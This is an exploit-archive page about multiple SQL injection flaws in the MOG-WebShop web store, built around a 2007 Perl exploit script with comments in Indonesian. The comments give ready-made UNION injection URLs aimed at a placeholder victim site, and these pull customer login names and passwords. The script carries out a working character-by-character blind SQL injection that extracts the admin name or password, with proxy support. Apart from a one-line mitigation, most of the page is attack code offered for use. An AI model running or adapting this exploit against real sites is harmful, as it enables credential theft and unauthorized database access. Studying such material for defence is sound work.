header-logo
Suggest Exploit
vendor:
MOG-WebShop
by:
k1tk4t
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MOG-WebShop
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOG-WebShop – Multiple Remote SQL Injection Vulnerabilities

The 'prod' variable in 'detail', the 'cat' variable in 'list', and the 'group' variable in 'index.php' are not properly filtered, allowing remote attackers to manipulate SQL queries via the browser.

Mitigation:

Ensure that user input is properly filtered and sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# MOG-WebShop => ? - Multiple Remote SQL Injection Vulnerabilities
# Waktu            :  Dec 15 2007 11:45AM
# Software         :  MOG-WebShop | http://mog-site.com/index.php?act=product&po=detil&id=3
# Vendor           :  http://mog-site.com/
# Demo Site        :  http://mog-site.com/mog_product/webshop/
# Ditemukan oleh   :  k1tk4t  |  http://newhack.org
# Lokasi           :  Indonesia
#
#
# - variable "prod" pada "detail" tidak terfilter dengan baik sebelumnya sehingga user dapat memanipulasi sql query melalui browser secara remote
# ;
# http://korban.site/index.php?page=details&prod=[SQLI]&cat=0&group=0
#
# - variable "cat" pada "list" tidak terfilter dengan baik sebelumnya sehingga user dapat memanipulasi sql query melalui browser secara remote
# ;
# http://korban.site/index.php?page=browse&action=list&group=0&cat=[SQLI]&orderby=DESCRIPTION
#
# - variable "group" pada berkas "index.php" tidak terfilter dengan baik sebelumnya sehingga user dapat memanipulasi sql query melalui browser secara remote
# ;
# http://korban.site/index.php?group=[Blind SQLI]&page=categories
#
# Contoh [SQLI] ;
# http://korban.site/index.php?page=browse&action=list&group=0&cat=-1/**/UNION/**/SELECT/**/null,concat(loginname,0x3a,password),null/**/from/**/customer/**/limit/**/0,1/*&orderby=DESCRIPTION
#
#
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
#
# ----------------------------------------------------------------
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |         Indonesian Newhack Technology           |";
 print "\n  |-------------------------------------------------|";
 print "\n  |  MOG-WebShop => ? (group) Blind SQL Injection   |";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |   DNX Code [dnx(at)hackermail.com] | Modified   |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Kutu pada index.php dengan variable (group) yang dapat dimanipulasi secara Blind SQLI";
 print "\n[!] Penggunaan : perl MOG-WebShop.pl [Host] [Path] ";
 print "\n[!] Contoh     : perl MOG-WebShop.pl 127.0.0.1 /WebShop/ -c 2 -o 1";
 print "\n[!] Options:";
 print "\n       -c [no]       nilai sebenarnya dari group pada index.php, default 1";
 print "\n       -o [no]       1 = admin name (default)";
 print "\n                     2 = admin password";
 print "\n       -p [ip:port]  Proxy support";
 print "\n";
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $cat     = 1;
my $column  = "loginname";
my %options = ();
GetOptions(\%options, "c=i", "o=i", "p=s");

print "[!] Exploiting...\n";

if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "password"; }

syswrite(STDOUT, "[!] Data : ", 12);

for(my $i = 1; $i <= 32; $i++)
{
 my $found = 0;
 my $h = 48;
 while(!$found && $h <= 57)
 {
   if(istrue2($host, $path, $i, $h))
   {
     $found = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$found)
 {
   $h = 97;
   while(!$found && $h <= 122)
   {
     if(istrue2($host, $path, $i, $h))
     {
       $found = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print "\n[!] Exploit done\n";

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent->new;
 my $url = "http://".$host.$path."index.php?group=".$cat."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20customer%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")&page=categories";

 if($options{"p"})
 {
   $ua->proxy('http', "http://".$options{"p"});
 }

 my $response = $ua->get($url);
 my $content = $response->content;
 my $regexp = "cat.gif";

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }
}

# milw0rm.com [2007-12-18]